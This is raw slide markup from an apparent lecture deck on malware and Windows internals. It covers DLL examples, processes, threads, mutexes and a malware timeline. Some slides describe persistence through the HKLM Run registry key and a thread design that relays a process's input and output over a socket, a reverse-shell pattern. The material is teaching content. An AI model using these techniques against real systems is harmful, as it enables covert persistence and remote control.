            <a:off x="4595069" y="2982436"/>
            <a:ext cx="4450936" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>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 mainDLL.c</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#include “myDLL.h"</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int main(){</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message();</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return 0;</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27"/>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DLL example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214" name="Google Shape;1214;p127"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="5029518" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>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 File: SampleDLL.h</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#ifndef INDLL_H</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#define INDLL_H</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#ifdef EXPORTING_DLL</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extern __declspec(dllexport) void HelloWorld()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#else</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extern __declspec(dllimport) void HelloWorld()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#endif</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#endif</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5209030" y="2950225"/>
            <a:ext cx="3934970" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>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 SampleApp.cpp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#include "stdafx.h"</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#include "sampleDLL.h"</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int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)</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HelloWorld();</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return 0;</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28"/>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223" name="Google Shape;1223;p128"/>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Write an API code to execute a program when Windows OS start</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>API-&gt; Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>HKLM\Software\Microsoft\Windows\CurrentVersion\Run</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Name: myProgram</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Run: notepad.exe</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29"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p129"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Process</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Malware can also execute code outside the current program by creating a new process or modifying an existing one.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A process contains one or more threads that are executed by the CPU.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Malware: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Own independent process (Traditionally)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Executes as part of another process (Newer malware).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>API commands: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CreateProcess; GetCurrentProcess; OpenProcess</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Tek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3"/>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Real-world Impacts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;p13"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>2010 – Stuxnet Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>attacking Iran’s nuclear program and included the ability to impact hardware as well as software. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>2011 — Zeus Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>first detected in 2007, the author released the source code in 2011. Sometimes called Zbot, the most successful pieces of botnet software in the world, impacting millions of machines. It is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>2013 – Cryptolocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>early ransomware programs.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>2014 – Backoff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>compromise Point-of-Sale (POS) systems to steal credit card data.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="115384"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>2016 – Cerber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>One of the heavy-hitters in the ransomware sphere.</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>2017 – WannaCry Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600"/>
              <a:t>brought major computer systems in Russia, China, ­­the UK, and the US down, locking people out of their data and demanding they pay a ransom or lose everything. The virus affected at least 150 countries, including hospitals, banks, telecommunications companies, warehouses, and many other industries.</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30"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1235" name="Google Shape;1235;p130"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1236" name="Google Shape;1236;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="1268760"/>
            <a:ext cx="5760640" cy="5265224"/>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31"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p131"/>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Thread</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Processes are the container for execution, but threads are what the Windows OS executes.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>To create a new thread </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CreateThread, CreateToolhelp32Snapshot, Thread32First, Thread32Next</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Related image" id="1244" name="Google Shape;1244;p131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2680637" y="4005064"/>
            <a:ext cx="4716142" cy="271982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132"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1250" name="Google Shape;1250;p132"/>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76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1251" name="Google Shape;1251;p132"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="1124744"/>
            <a:ext cx="6274914" cy="5320832"/>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33"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258" name="Google Shape;1258;p133"/>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Malware can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CreateThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> in multiple ways:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Load a new malicious library into a process</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Create two new threads for input and output</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>One to listen on a socket or pipe 🡪 output that to standard input of a process.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>One to read from standard output 🡪 send that to a socket or pipe.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>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34"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1264" name="Google Shape;1264;p134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520"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Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> (Mutant)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Mutexes are global objects that coordinate multiple processes and threads.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>E.g. A </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> can control access of 2 threads to the memory.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Only one thread can own a mutex at a time</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Mutex calls:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>WaitForSingleObject: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>thread gains access to the mutex.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>ReleaseMutex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>thread is finished using a mutex</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>CreateMutex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A mutex is created</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>OpenMutex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Allow one process can get a handle to another process’s mutex</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>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135"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1270" name="Google Shape;1270;p135"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1271" name="Google Shape;1271;p135"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
